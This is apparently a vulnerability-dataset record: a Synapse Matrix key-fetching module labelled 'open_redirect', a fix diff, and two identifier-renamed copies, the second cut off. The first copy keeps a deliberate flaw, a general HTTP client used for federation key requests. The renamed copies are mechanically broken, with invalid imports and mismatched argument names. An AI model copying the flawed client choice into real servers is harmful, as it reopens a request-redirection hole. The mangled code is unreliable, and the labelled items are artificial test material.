logger.exception("Error starting key lookups")
async def wait_for_previous_lookups(self, server_names) -> None:
"""Waits for any previous key lookups for the given servers to finish.
Args:
server_names (Iterable[str]): list of servers which we want to look up
Returns:
Resolves once all key lookups for the given servers have
completed. Follows the synapse rules of logcontext preservation.
"""
loop_count = 1
while True:
wait_on = [
(server_name, self.key_downloads[server_name])
for server_name in server_names
if server_name in self.key_downloads
]
if not wait_on:
break
logger.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in wait_on],
loop_count,
)
with PreserveLoggingContext():
await defer.DeferredList((w[1] for w in wait_on))
loop_count += 1
def _get_server_verify_keys(self, verify_requests):
"""Tries to find at least one key for each verify request
For each verify_request, verify_request.key_ready is called back with
params (server_name, key_id, VerifyKey) if a key is found, or errbacked
with a SynapseError if none of the keys are found.
Args:
verify_requests (list[VerifyJsonRequest]): list of verify requests
"""
remaining_requests = {rq for rq in verify_requests if not rq.key_ready.called}
async def do_iterations():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not remaining_requests:
return
await self._attempt_key_fetches_with_fetcher(
f, remaining_requests
)
# look for any requests which weren't satisfied
while remaining_requests:
verify_request = remaining_requests.pop()
rq_str = (
"VerifyJsonRequest(server=%s, key_ids=%s, min_valid=%i)"
% (
verify_request.server_name,
verify_request.key_ids,
verify_request.minimum_valid_until_ts,
)
)
# If we run the errback immediately, it may cancel our
# loggingcontext while we are still in it, so instead we
# schedule it for the next time round the reactor.
#
# (this also ensures that we don't get a stack overflow if we
# has a massive queue of lookups waiting for this server).
self.clock.call_later(
0,
verify_request.key_ready.errback,
SynapseError(
401,
"Failed to find any key to satisfy %s" % (rq_str,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
# we don't really expect to get here, because any errors should already
# have been caught and logged. But if we do, let's log the error and make
# sure that all of the deferreds are resolved.
logger.error("Unexpected error in _get_server_verify_keys: %s", err)
with PreserveLoggingContext():
for verify_request in remaining_requests:
if not verify_request.key_ready.called:
verify_request.key_ready.errback(err)
run_in_background(do_iterations)
async def _attempt_key_fetches_with_fetcher(self, fetcher, remaining_requests):
"""Use a key fetcher to attempt to satisfy some key requests
Args:
fetcher (KeyFetcher): fetcher to use to fetch the keys
remaining_requests (set[VerifyJsonRequest]): outstanding key requests.
Any successfully-completed requests will be removed from the list.
"""
# dict[str, dict[str, int]]: keys to fetch.
# server_name -> key_id -> min_valid_ts
missing_keys = defaultdict(dict)
for verify_request in remaining_requests:
# any completed requests should already have been removed
assert not verify_request.key_ready.called
keys_for_server = missing_keys[verify_request.server_name]
for key_id in verify_request.key_ids:
# If we have several requests for the same key, then we only need to
# request that key once, but we should do so with the greatest
# min_valid_until_ts of the requests, so that we can satisfy all of
# the requests.
keys_for_server[key_id] = max(
keys_for_server.get(key_id, -1),
verify_request.minimum_valid_until_ts,
)
results = await fetcher.get_keys(missing_keys)
completed = []
for verify_request in remaining_requests:
server_name = verify_request.server_name
# see if any of the keys we got this time are sufficient to
# complete this VerifyJsonRequest.
result_keys = results.get(server_name, {})
for key_id in verify_request.key_ids:
fetch_key_result = result_keys.get(key_id)
if not fetch_key_result:
# we didn't get a result for this key
continue
if (
fetch_key_result.valid_until_ts
< verify_request.minimum_valid_until_ts
):
# key was not valid at this point
continue
# we have a valid key for this request. If we run the callback
# immediately, it may cancel our loggingcontext while we are still in
# it, so instead we schedule it for the next time round the reactor.
#
# (this also ensures that we don't get a stack overflow if we had
# a massive queue of lookups waiting for this server).
logger.debug(
"Found key %s:%s for %s",
server_name,
key_id,
verify_request.request_name,
)
self.clock.call_later(
0,
verify_request.key_ready.callback,
(server_name, key_id, fetch_key_result.verify_key),
)
completed.append(verify_request)
break
remaining_requests.difference_update(completed)
class KeyFetcher:
async def get_keys(self, keys_to_fetch):
"""
Args:
keys_to_fetch (dict[str, dict[str, int]]):
the keys to be fetched. server_name -> key_id -> min_valid_ts
Returns:
Deferred[dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]]:
map from server_name -> key_id -> FetchKeyResult
"""
raise NotImplementedError
class StoreKeyFetcher(KeyFetcher):
"""KeyFetcher impl which fetches keys from our data store"""
def __init__(self, hs):
self.store = hs.get_datastore()
async def get_keys(self, keys_to_fetch):
"""see KeyFetcher.get_keys"""
keys_to_fetch = (
(server_name, key_id)
for server_name, keys_for_server in keys_to_fetch.items()
for key_id in keys_for_server.keys()
)
res = await self.store.get_server_verify_keys(keys_to_fetch)
keys = {}
for (server_name, key_id), key in res.items():
keys.setdefault(server_name, {})[key_id] = key
return keys
class BaseV2KeyFetcher:
def __init__(self, hs):
self.store = hs.get_datastore()
self.config = hs.get_config()
async def process_v2_response(self, from_server, response_json, time_added_ms):
"""Parse a 'Server Keys' structure from the result of a /key request
This is used to parse either the entirety of the response from
GET /_matrix/key/v2/server, or a single entry from the list returned by
POST /_matrix/key/v2/query.
Checks that each signature in the response that claims to come from the origin
server is valid, and that there is at least one such signature.
Stores the json in server_keys_json so that it can be used for future responses
to /_matrix/key/v2/query.
Args:
from_server (str): the name of the server producing this result: either
the origin server for a /_matrix/key/v2/server request, or the notary
for a /_matrix/key/v2/query.
response_json (dict): the json-decoded Server Keys response object
time_added_ms (int): the timestamp to record in server_keys_json
Returns:
Deferred[dict[str, FetchKeyResult]]: map from key_id to result object
"""
ts_valid_until_ms = response_json["valid_until_ts"]
# start by extracting the keys from the response, since they may be required
# to validate the signature on the response.
verify_keys = {}
for key_id, key_data in response_json["verify_keys"].items():
if is_signing_algorithm_supported(key_id):
key_base64 = key_data["key"]
key_bytes = decode_base64(key_base64)
verify_key = decode_verify_key_bytes(key_id, key_bytes)
verify_keys[key_id] = FetchKeyResult(
verify_key=verify_key, valid_until_ts=ts_valid_until_ms
)
server_name = response_json["server_name"]
verified = False
for key_id in response_json["signatures"].get(server_name, {}):
key = verify_keys.get(key_id)
if not key:
# the key may not be present in verify_keys if:
# * we got the key from the notary server, and:
# * the key belongs to the notary server, and:
# * the notary server is using a different key to sign notary
# responses.
continue
verify_signed_json(response_json, server_name, key.verify_key)
verified = True
break
if not verified:
raise KeyLookupError(
"Key response for %s is not signed by the origin server"
% (server_name,)
)
for key_id, key_data in response_json["old_verify_keys"].items():
if is_signing_algorithm_supported(key_id):
key_base64 = key_data["key"]
key_bytes = decode_base64(key_base64)
verify_key = decode_verify_key_bytes(key_id, key_bytes)
verify_keys[key_id] = FetchKeyResult(
verify_key=verify_key, valid_until_ts=key_data["expired_ts"]
)
key_json_bytes = encode_canonical_json(response_json)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
server_name=server_name,
key_id=key_id,
from_server=from_server,
ts_now_ms=time_added_ms,
ts_expires_ms=ts_valid_until_ms,
key_json_bytes=key_json_bytes,
)
for key_id in verify_keys
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return verify_keys
class PerspectivesKeyFetcher(BaseV2KeyFetcher):
"""KeyFetcher impl which fetches keys from the "perspectives" servers"""
def __init__(self, hs):
super().__init__(hs)
self.clock = hs.get_clock()
self.client = hs.get_federation_http_client()
self.key_servers = self.config.key_servers
async def get_keys(self, keys_to_fetch):
"""see KeyFetcher.get_keys"""
async def get_key(key_server):
try:
result = await self.get_server_verify_key_v2_indirect(
keys_to_fetch, key_server
)
return result
except KeyLookupError as e:
logger.warning(
"Key lookup failed from %r: %s", key_server.server_name, e
)
except Exception as e:
logger.exception(
"Unable to get key from %r: %s %s",
key_server.server_name,
type(e).__name__,
str(e),
)
return {}
results = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(get_key, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
union_of_keys = {}
for result in results:
for server_name, keys in result.items():
union_of_keys.setdefault(server_name, {}).update(keys)
return union_of_keys
async def get_server_verify_key_v2_indirect(self, keys_to_fetch, key_server):
"""
Args:
keys_to_fetch (dict[str, dict[str, int]]):
the keys to be fetched. server_name -> key_id -> min_valid_ts
key_server (synapse.config.key.TrustedKeyServer): notary server to query for
the keys
Returns:
dict[str, dict[str, synapse.storage.keys.FetchKeyResult]]: map
from server_name -> key_id -> FetchKeyResult
Raises:
KeyLookupError if there was an error processing the entire response from
the server
"""
perspective_name = key_server.server_name
logger.info(
"Requesting keys %s from notary server %s",
keys_to_fetch.items(),
perspective_name,
)
try:
query_response = await self.client.post_json(
destination=perspective_name,
path="/_matrix/key/v2/query",
data={
"server_keys": {
server_name: {
key_id: {"minimum_valid_until_ts": min_valid_ts}
for key_id, min_valid_ts in server_keys.items()
}
for server_name, server_keys in keys_to_fetch.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
# these both have str() representations which we can't really improve upon
raise KeyLookupError(str(e))
except HttpResponseException as e:
raise KeyLookupError("Remote server returned an error: %s" % (e,))
keys = {}
added_keys = []
time_now_ms = self.clock.time_msec()
for response in query_response["server_keys"]:
# do this first, so that we can give useful errors thereafter
server_name = response.get("server_name")
if not isinstance(server_name, str):
raise KeyLookupError(
"Malformed response from key notary server %s: invalid server_name"
% (perspective_name,)
)
try:
self._validate_perspectives_response(key_server, response)
processed_response = await self.process_v2_response(
perspective_name, response, time_added_ms=time_now_ms
)
except KeyLookupError as e:
logger.warning(
"Error processing response from key notary server %s for origin "
"server %s: %s",
perspective_name,
server_name,
e,
)
# we continue to process the rest of the response
continue
added_keys.extend(
(server_name, key_id, key) for key_id, key in processed_response.items()
)
keys.setdefault(server_name, {}).update(processed_response)
await self.store.store_server_verify_keys(
perspective_name, time_now_ms, added_keys
)
return keys
def _validate_perspectives_response(self, key_server, response):
"""Optionally check the signature on the result of a /key/query request
Args:
key_server (synapse.config.key.TrustedKeyServer): the notary server that
produced this result
response (dict): the json-decoded Server Keys response object
"""
perspective_name = key_server.server_name
perspective_keys = key_server.verify_keys
if perspective_keys is None:
# signature checking is disabled on this server
return
if (
"signatures" not in response
or perspective_name not in response["signatures"]
):
raise KeyLookupError("Response not signed by the notary server")
verified = False
for key_id in response["signatures"][perspective_name]:
if key_id in perspective_keys:
verify_signed_json(response, perspective_name, perspective_keys[key_id])
verified = True
if not verified:
raise KeyLookupError(
"Response not signed with a known key: signed with: %r, known keys: %r"
% (
list(response["signatures"][perspective_name].keys()),
list(perspective_keys.keys()),
)
)
class ServerKeyFetcher(BaseV2KeyFetcher):
"""KeyFetcher impl which fetches keys from the origin servers"""
def __init__(self, hs):
super().__init__(hs)
self.clock = hs.get_clock()
self.client = hs.get_federation_http_client()
async def get_keys(self, keys_to_fetch):
"""
Args:
keys_to_fetch (dict[str, iterable[str]]):
the keys to be fetched. server_name -> key_ids
Returns:
dict[str, dict[str, synapse.storage.keys.FetchKeyResult|None]]:
map from server_name -> key_id -> FetchKeyResult
"""
results = {}
async def get_key(key_to_fetch_item):
server_name, key_ids = key_to_fetch_item
try:
keys = await self.get_server_verify_key_v2_direct(server_name, key_ids)
results[server_name] = keys
except KeyLookupError as e:
logger.warning(
"Error looking up keys %s from %s: %s", key_ids, server_name, e
)
except Exception:
logger.exception("Error getting keys %s from %s", key_ids, server_name)
await yieldable_gather_results(get_key, keys_to_fetch.items())
return results
async def get_server_verify_key_v2_direct(self, server_name, key_ids):
"""
Args:
server_name (str):
key_ids (iterable[str]):
Returns:
dict[str, FetchKeyResult]: map from key ID to lookup result
Raises:
KeyLookupError if there was a problem making the lookup
"""
keys = {} # type: dict[str, FetchKeyResult]
for requested_key_id in key_ids:
# we may have found this key as a side-effect of asking for another.
if requested_key_id in keys:
continue
time_now_ms = self.clock.time_msec()
try:
response = await self.client.get_json(
destination=server_name,
path="/_matrix/key/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
# we only give the remote server 10s to respond. It should be an
# easy request to handle, so if it doesn't reply within 10s, it's
# probably not going to.
#
# Furthermore, when we are acting as a notary server, we cannot
# wait all day for all of the origin servers, as the requesting
# server will otherwise time out before we can respond.
#
# (Note that get_json may make 4 attempts, so this can still take
# almost 45 seconds to fetch the headers, plus up to another 60s to
# read the response).
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
# these both have str() representations which we can't really improve
# upon
raise KeyLookupError(str(e))
except HttpResponseException as e:
raise KeyLookupError("Remote server returned an error: %s" % (e,))
if response["server_name"] != server_name:
raise KeyLookupError(
"Expected a response for server %r not %r"
% (server_name, response["server_name"])
)
response_keys = await self.process_v2_response(
from_server=server_name,
response_json=response,
time_added_ms=time_now_ms,
)
await self.store.store_server_verify_keys(
server_name,
time_now_ms,
((server_name, key_id, key) for key_id, key in response_keys.items()),
)
keys.update(response_keys)
return keys
async def _handle_key_deferred(verify_request) -> None:
"""Waits for the key to become available, and then performs a verification
Args:
verify_request (VerifyJsonRequest):
Raises:
SynapseError if there was a problem performing the verification
"""
server_name = verify_request.server_name
with PreserveLoggingContext():
_, key_id, verify_key = await verify_request.key_ready
json_object = verify_request.json_object
try:
verify_signed_json(json_object, server_name, verify_key)
except SignatureVerifyException as e:
logger.debug(
"Error verifying signature for %s:%s:%s with key %s: %s",
server_name,
verify_key.alg,
verify_key.version,
encode_verify_key_base64(verify_key),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with key %s:%s: %s"
% (server_name, verify_key.alg, verify_key.version, str(e)),
Codes.UNAUTHORIZED,
)
| open_redirect | {
"code": [
" self.client = hs.get_http_client()",
" self.client = hs.get_http_client()"
],
"line_no": [
581,
751
]
} | {
"code": [
" self.client = hs.get_federation_http_client()",
" self.client = hs.get_federation_http_client()"
],
"line_no": [
581,
751
]
} |
import logging
import urllib
from collections import .defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import .decode_base64
from twisted.internet import .defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class CLASS_0:
VAR_2 = attr.ib()
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
VAR_6 = attr.ib(init=False)
VAR_7 = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class CLASS_1(ValueError):
pass
class CLASS_2:
def __init__(self, VAR_8, VAR_9=None):
self.clock = VAR_8.get_clock()
if VAR_9 is None:
VAR_9 = (
CLASS_4(VAR_8),
CLASS_6(VAR_8),
CLASS_7(VAR_8),
)
self._key_fetchers = VAR_9
self.key_downloads = {}
def FUNC_1(
self, VAR_2, VAR_3, VAR_10, VAR_5
):
VAR_22 = CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
VAR_23 = (VAR_22,)
return make_deferred_yieldable(self._verify_objects(VAR_23)[0])
def FUNC_2(self, VAR_11):
return self._verify_objects(
CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
for VAR_2, VAR_3, VAR_10, VAR_5 in VAR_11
)
def FUNC_3(self, VAR_12):
VAR_24 = []
VAR_25 = preserve_fn(FUNC_0)
def FUNC_13(VAR_1):
if not VAR_1.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (VAR_1.server_name,),
Codes.UNAUTHORIZED,
)
)
VAR_0.debug(
"Verifying %s for %s with VAR_6 %s, min_validity %i",
VAR_1.request_name,
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
VAR_24.append(VAR_1)
return VAR_25(VAR_1)
VAR_26 = [FUNC_13(r) for r in VAR_12]
if VAR_24:
run_in_background(self._start_key_lookups, VAR_24)
return VAR_26
async def FUNC_4(self, VAR_12):
try:
VAR_45 = {}
for VAR_1 in VAR_12:
VAR_2 = VAR_1.server_name
VAR_52 = id(VAR_1)
VAR_45.setdefault(VAR_2, set()).add(VAR_52)
await self.wait_for_previous_lookups(VAR_45.keys())
for VAR_2 in VAR_45.keys():
self.key_downloads[VAR_2] = defer.Deferred()
VAR_0.debug("Got VAR_49 lookup lock on %s", VAR_2)
def FUNC_16(VAR_2):
VAR_53 = self.key_downloads.pop(VAR_2)
VAR_53.callback(None)
def FUNC_17(VAR_30, VAR_1):
VAR_2 = VAR_1.server_name
VAR_54 = VAR_45[VAR_2]
VAR_54.remove(id(VAR_1))
if not VAR_54:
VAR_0.debug("Releasing VAR_49 lookup lock on %s", VAR_2)
FUNC_16(VAR_2)
return VAR_30
for VAR_1 in VAR_12:
VAR_1.key_ready.addBoth(FUNC_17, VAR_1)
self._get_server_verify_keys(VAR_12)
except Exception:
VAR_0.exception("Error starting VAR_49 lookups")
async def FUNC_5(self, VAR_13) -> None:
VAR_27 = 1
while True:
VAR_46 = [
(VAR_2, self.key_downloads[VAR_2])
for VAR_2 in VAR_13
if VAR_2 in self.key_downloads
]
if not VAR_46:
break
VAR_0.info(
"Waiting for existing lookups for %s to complete [loop %i]",
[w[0] for w in VAR_46],
VAR_27,
)
with PreserveLoggingContext():
await defer.DeferredList((w[1] for w in VAR_46))
VAR_27 += 1
def FUNC_6(self, VAR_12):
VAR_15 = {rq for rq in VAR_12 if not rq.key_ready.called}
async def FUNC_14():
try:
with Measure(self.clock, "get_server_verify_keys"):
for f in self._key_fetchers:
if not VAR_15:
return
await self._attempt_key_fetches_with_fetcher(
f, VAR_15
)
while VAR_15:
VAR_1 = VAR_15.pop()
VAR_60 = (
"VerifyJsonRequest(server=%s, VAR_6=%s, min_valid=%i)"
% (
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
)
self.clock.call_later(
0,
VAR_1.key_ready.errback,
SynapseError(
401,
"Failed to find any VAR_49 to satisfy %s" % (VAR_60,),
Codes.UNAUTHORIZED,
),
)
except Exception as err:
VAR_0.error("Unexpected error in FUNC_6: %s", err)
with PreserveLoggingContext():
for VAR_1 in VAR_15:
if not VAR_1.key_ready.called:
VAR_1.key_ready.errback(err)
run_in_background(FUNC_14)
async def FUNC_7(self, VAR_14, VAR_15):
VAR_28 = defaultdict(dict)
for VAR_1 in VAR_15:
assert not VAR_1.key_ready.called
VAR_47 = VAR_28[VAR_1.server_name]
for VAR_43 in VAR_1.key_ids:
VAR_47[VAR_43] = max(
VAR_47.get(VAR_43, -1),
VAR_1.minimum_valid_until_ts,
)
VAR_26 = await VAR_14.get_keys(VAR_28)
VAR_29 = []
for VAR_1 in VAR_15:
VAR_2 = VAR_1.server_name
VAR_48 = VAR_26.get(VAR_2, {})
for VAR_43 in VAR_1.key_ids:
VAR_55 = VAR_48.get(VAR_43)
if not VAR_55:
continue
if (
VAR_55.valid_until_ts
< VAR_1.minimum_valid_until_ts
):
continue
VAR_0.debug(
"Found VAR_49 %s:%s for %s",
VAR_2,
VAR_43,
VAR_1.request_name,
)
self.clock.call_later(
0,
VAR_1.key_ready.callback,
(VAR_2, VAR_43, VAR_55.verify_key),
)
VAR_29.append(VAR_1)
break
VAR_15.difference_update(VAR_29)
class CLASS_3:
async def FUNC_8(self, VAR_16):
raise NotImplementedError
class CLASS_4(CLASS_3):
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
async def FUNC_8(self, VAR_16):
VAR_16 = (
(VAR_2, VAR_43)
for VAR_2, VAR_47 in VAR_16.items()
for VAR_43 in VAR_47.keys()
)
VAR_30 = await self.store.get_server_verify_keys(VAR_16)
VAR_31 = {}
for (VAR_2, VAR_43), VAR_49 in VAR_30.items():
VAR_31.setdefault(VAR_2, {})[VAR_43] = VAR_49
return VAR_31
class CLASS_5:
def __init__(self, VAR_8):
self.store = VAR_8.get_datastore()
self.config = VAR_8.get_config()
async def FUNC_9(self, VAR_17, VAR_18, VAR_19):
VAR_32 = VAR_18["valid_until_ts"]
VAR_33 = {}
for VAR_43, key_data in VAR_18["verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=VAR_32
)
VAR_2 = VAR_18["server_name"]
VAR_34 = False
for VAR_43 in VAR_18["signatures"].get(VAR_2, {}):
VAR_49 = VAR_33.get(VAR_43)
if not VAR_49:
continue
verify_signed_json(VAR_18, VAR_2, VAR_49.verify_key)
VAR_34 = True
break
if not VAR_34:
raise CLASS_1(
"Key VAR_21 for %s is not signed by the origin server"
% (VAR_2,)
)
for VAR_43, key_data in VAR_18["old_verify_keys"].items():
if is_signing_algorithm_supported(VAR_43):
VAR_56 = key_data["key"]
VAR_57 = decode_base64(VAR_56)
VAR_44 = decode_verify_key_bytes(VAR_43, VAR_57)
VAR_33[VAR_43] = FetchKeyResult(
VAR_44=verify_key, valid_until_ts=key_data["expired_ts"]
)
VAR_35 = encode_canonical_json(VAR_18)
await make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.store_server_keys_json,
VAR_2=VAR_2,
VAR_43=key_id,
VAR_17=from_server,
ts_now_ms=VAR_19,
ts_expires_ms=VAR_32,
VAR_35=key_json_bytes,
)
for VAR_43 in VAR_33
],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
return VAR_33
class CLASS_6(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_http_client()
self.key_servers = self.config.key_servers
async def FUNC_8(self, VAR_16):
async def FUNC_15(VAR_20):
try:
VAR_58 = await self.get_server_verify_key_v2_indirect(
VAR_16, VAR_20
)
return VAR_58
except CLASS_1 as e:
VAR_0.warning(
"Key lookup failed from %r: %s", VAR_20.server_name, e
)
except Exception as e:
VAR_0.exception(
"Unable to get VAR_49 from %r: %s %s",
VAR_20.server_name,
type(e).__name__,
str(e),
)
return {}
VAR_26 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_15, server) for server in self.key_servers],
consumeErrors=True,
).addErrback(unwrapFirstError)
)
VAR_36 = {}
for VAR_58 in VAR_26:
for VAR_2, VAR_31 in VAR_58.items():
VAR_36.setdefault(VAR_2, {}).update(VAR_31)
return VAR_36
async def FUNC_10(self, VAR_16, VAR_20):
VAR_37 = VAR_20.server_name
VAR_0.info(
"Requesting VAR_31 %s from notary server %s",
VAR_16.items(),
VAR_37,
)
try:
VAR_50 = await self.client.post_json(
destination=VAR_37,
path="/_matrix/VAR_49/v2/query",
data={
"server_keys": {
VAR_2: {
VAR_43: {"minimum_valid_until_ts": min_valid_ts}
for VAR_43, min_valid_ts in server_keys.items()
}
for VAR_2, server_keys in VAR_16.items()
}
},
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
VAR_31 = {}
VAR_38 = []
VAR_39 = self.clock.time_msec()
for VAR_21 in VAR_50["server_keys"]:
VAR_2 = VAR_21.get("server_name")
if not isinstance(VAR_2, str):
raise CLASS_1(
"Malformed VAR_21 from VAR_49 notary server %s: invalid server_name"
% (VAR_37,)
)
try:
self._validate_perspectives_response(VAR_20, VAR_21)
VAR_59 = await self.process_v2_response(
VAR_37, VAR_21, VAR_19=VAR_39
)
except CLASS_1 as e:
VAR_0.warning(
"Error processing VAR_21 from VAR_49 notary server %s for origin "
"server %s: %s",
VAR_37,
VAR_2,
e,
)
continue
VAR_38.extend(
(VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_59.items()
)
VAR_31.setdefault(VAR_2, {}).update(VAR_59)
await self.store.store_server_verify_keys(
VAR_37, VAR_39, VAR_38
)
return VAR_31
def FUNC_11(self, VAR_20, VAR_21):
VAR_37 = VAR_20.server_name
VAR_40 = VAR_20.verify_keys
if VAR_40 is None:
return
if (
"signatures" not in VAR_21
or VAR_37 not in VAR_21["signatures"]
):
raise CLASS_1("Response not signed by the notary server")
VAR_34 = False
for VAR_43 in VAR_21["signatures"][VAR_37]:
if VAR_43 in VAR_40:
verify_signed_json(VAR_21, VAR_37, VAR_40[VAR_43])
VAR_34 = True
if not VAR_34:
raise CLASS_1(
"Response not signed with a known VAR_49: signed with: %r, known VAR_31: %r"
% (
list(VAR_21["signatures"][VAR_37].keys()),
list(VAR_40.keys()),
)
)
class CLASS_7(CLASS_5):
def __init__(self, VAR_8):
super().__init__(VAR_8)
self.clock = VAR_8.get_clock()
self.client = VAR_8.get_http_client()
async def FUNC_8(self, VAR_16):
VAR_26 = {}
async def FUNC_15(VAR_41):
VAR_2, VAR_6 = VAR_41
try:
VAR_31 = await self.get_server_verify_key_v2_direct(VAR_2, VAR_6)
VAR_26[VAR_2] = VAR_31
except CLASS_1 as e:
VAR_0.warning(
"Error looking up VAR_31 %s from %s: %s", VAR_6, VAR_2, e
)
except Exception:
VAR_0.exception("Error getting VAR_31 %s from %s", VAR_6, VAR_2)
await yieldable_gather_results(FUNC_15, VAR_16.items())
return VAR_26
async def FUNC_12(self, VAR_2, VAR_6):
VAR_31 = {} # type: dict[str, FetchKeyResult]
for requested_key_id in VAR_6:
if requested_key_id in VAR_31:
continue
VAR_39 = self.clock.time_msec()
try:
VAR_21 = await self.client.get_json(
destination=VAR_2,
path="/_matrix/VAR_49/v2/server/"
+ urllib.parse.quote(requested_key_id),
ignore_backoff=True,
timeout=10000,
)
except (NotRetryingDestination, RequestSendFailed) as e:
raise CLASS_1(str(e))
except HttpResponseException as e:
raise CLASS_1("Remote server returned an error: %s" % (e,))
if VAR_21["server_name"] != VAR_2:
raise CLASS_1(
"Expected a VAR_21 for server %r not %r"
% (VAR_2, VAR_21["server_name"])
)
VAR_51 = await self.process_v2_response(
VAR_17=VAR_2,
VAR_18=VAR_21,
VAR_19=VAR_39,
)
await self.store.store_server_verify_keys(
VAR_2,
VAR_39,
((VAR_2, VAR_43, VAR_49) for VAR_43, VAR_49 in VAR_51.items()),
)
VAR_31.update(VAR_51)
return VAR_31
async def FUNC_0(VAR_1) -> None:
VAR_2 = VAR_1.server_name
with PreserveLoggingContext():
VAR_42, VAR_43, VAR_44 = await VAR_1.key_ready
VAR_3 = VAR_1.json_object
try:
verify_signed_json(VAR_3, VAR_2, VAR_44)
except SignatureVerifyException as e:
VAR_0.debug(
"Error verifying signature for %s:%s:%s with VAR_49 %s: %s",
VAR_2,
VAR_44.alg,
VAR_44.version,
encode_verify_key_base64(VAR_44),
str(e),
)
raise SynapseError(
401,
"Invalid signature for server %s with VAR_49 %s:%s: %s"
% (VAR_2, VAR_44.alg, VAR_44.version, str(e)),
Codes.UNAUTHORIZED,
)
|
import logging
import urllib
from collections import .defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import .decode_base64
from twisted.internet import .defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class CLASS_0:
VAR_2 = attr.ib()
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
VAR_6 = attr.ib(init=False)
VAR_7 = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class CLASS_1(ValueError):
pass
class CLASS_2:
def __init__(self, VAR_8, VAR_9=None):
self.clock = VAR_8.get_clock()
if VAR_9 is None:
VAR_9 = (
CLASS_4(VAR_8),
CLASS_6(VAR_8),
CLASS_7(VAR_8),
)
self._key_fetchers = VAR_9
self.key_downloads = {}
def FUNC_1(
self, VAR_2, VAR_3, VAR_10, VAR_5
):
VAR_22 = CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
VAR_23 = (VAR_22,)
return make_deferred_yieldable(self._verify_objects(VAR_23)[0])
def FUNC_2(self, VAR_11):
return self._verify_objects(
CLASS_0(VAR_2, VAR_3, VAR_10, VAR_5)
for VAR_2, VAR_3, VAR_10, VAR_5 in VAR_11
)
def FUNC_3(self, VAR_12):
VAR_24 = []
VAR_25 = preserve_fn(FUNC_0)
def FUNC_13(VAR_1):
if not VAR_1.key_ids:
return defer.fail(
SynapseError(
400,
"Not signed by %s" % (VAR_1.server_name,),
Codes.UNAUTHORIZED,
)
)
VAR_0.debug(
"Verifying %s for %s with VAR_6 %s, min_validity %i",
VAR_1.request_name,
VAR_1.server_name,
VAR_1.key_ids,
VAR_1.minimum_valid_until_ts,
)
VAR_24.append(VAR_1)
return VAR_25(VAR_1)
VAR_26 = [FUNC_13(r) for r in VAR_12]
if VAR_24:
run_in_background(self._start_key_lookups, VAR_24)
return VAR_26
async def FUNC_4(self, VAR_12):
try:
VAR_45 = {}
for VAR_1 in VAR_12:
VAR_2 = VAR_1.server_name
VAR_52 = id(VAR_1)
VAR_45.setdefault(VAR_2, set()).add(VAR_52)
await self.wait_for_previous_lookups(VAR_45.keys())
for VAR_2 in VAR_45.keys():
self.key_downloads[VAR_2] = defer.Deferred()
